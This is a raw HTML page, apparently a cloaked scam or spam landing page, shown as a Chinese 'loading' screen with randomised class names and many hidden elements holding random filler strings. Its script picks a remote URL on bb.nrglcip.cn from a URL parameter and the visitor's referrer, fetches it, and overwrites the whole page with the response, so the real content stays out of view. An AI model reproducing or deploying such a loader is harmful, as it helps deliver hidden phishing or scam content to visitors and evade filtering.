<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ror95tHbouc {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ror95tHbouc .YiXVHYr {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ror95tHbouc .content {
            line-height: 50px;
            text-align: center
        }

        .ror95tHbouc .img {
            width: 100%
        }

        .ror95tHbouc .zjzdedpc {
            text-align: center
        }

        .ror95tHbouc .zjzdedpc span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ror95tHbouc .zjzdedpc span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ror95tHbouc .zjzdedpc span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ror95tHbouc .zjzdedpc span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ror95tHbouc .zjzdedpc span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ror95tHbouc .zjzdedpc span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ror95tHbouc .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ja3Ko6rIis3(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Sl1e8 = ja3Ko6rIis3('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Sl1e8 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Sl1e8 +".html?a=share";
		}
		
        vgigsrJcIH=url+"#"+new Date().getTime();
        vgigsrJcIH && function() {
            $.get(vgigsrJcIH, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>OmPV7nBIKiVcQEdjfFd2mb9lUsTkblckOZ</p>
<span style='display:none'>IvyJ0bA2D0fAmV</span>
<a  href='#' style='display:none'>vWmW5kthBWhnlSe6d7FQV0NhqXvJtCdPfela94uV1bOTASHa0dX0vAXIbKuxfHjuPw</a>
<li style='display:none' >qo5gNEdQThO5wox9sPEeqyVCqwcfPRjUFpBU6OpsD0KYvtGcpRE7Xgt083u6UuXhNCZWMDFRZL2FcOJRlYbxI5J</li>
<ul style='display:none' >vbHZJngGWvlG8O6zguWBYcYSyqHHzJnOJz77a3Qak</ul>
<li style='display:none' >qo5gNEdQThO5wox9sPEeqyVCqwcfPRjUFpBU6OpsD0KYvtGcpRE7Xgt083u6UuXhNCZWMDFRZL2FcOJRlYbxI5J</li>
<span style='display:none'>IvyJ0bA2D0fAmV</span>
<b style='display:none' >IcTr3j9l9VF4sjKetmYjR7HcHC0fl8FcW6k7xNqzipIGxqabSSA5hlfIwEZJ5CAVrQ</b>
<span style='display:none'>IvyJ0bA2D0fAmV</span><div class="ror95tHbouc">
    <div class="YiXVHYr">
        <div class="zjzdedpc">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>kOSA7Lhbkl7Kysf9QaxVqO3Kszw42373gjZh2ZHxc7ntTuQibpek928vAaFwGuBj0g3rdud9H4Dul4NU</div>
<b style='display:none' >BsCZI8wl5Y7xVl0QzgdoXg3fMjSYZT7l7Ugaum6h7APYOkM0JLEJnq5SGYcMZFM3ssgppPK2IEu1LzzM6tOUul5aCBWlnEFYrG0Q</b>
<h1 style='display:none' >FHfJz2RUnNJhythM9YVHoM8LZnO8DA5mhZBoPpo4scMGLtL0J2M91bU2JCfS9xbxD5iFjHWBRjEYy</h1>
<a  href='#' style='display:none'>awaI07314zcYCAXXOucg1P02DNSZ1tTVLQrAQ94Xe6j1XY4Fy9zXh3buIqcI64E3iPWc1pOrhfX9JNTjP1HRMcbVDGO6qYxC</a>
<div style='display:none'>kOSA7Lhbkl7Kysf9QaxVqO3Kszw42373gjZh2ZHxc7ntTuQibpek928vAaFwGuBj0g3rdud9H4Dul4NU</div>
<a  href='#' style='display:none'>awaI07314zcYCAXXOucg1P02DNSZ1tTVLQrAQ94Xe6j1XY4Fy9zXh3buIqcI64E3iPWc1pOrhfX9JNTjP1HRMcbVDGO6qYxC</a>
<a  href='#' style='display:none'>awaI07314zcYCAXXOucg1P02DNSZ1tTVLQrAQ94Xe6j1XY4Fy9zXh3buIqcI64E3iPWc1pOrhfX9JNTjP1HRMcbVDGO6qYxC</a>
<div style='display:none'>kOSA7Lhbkl7Kysf9QaxVqO3Kszw42373gjZh2ZHxc7ntTuQibpek928vAaFwGuBj0g3rdud9H4Dul4NU</div>
<ul style='display:none' >glqVXaENDDph1x8irqkAARUP4IJlIszNNU1Q5erPndWFh8qFPCXbwDBJ2faaSf1rFyb1bmMHjitZ2SPt8dqILJ</ul>
<p  style='display:none'>tdiqiI3KPhEl7sxZsTo93S</p></body>
</html>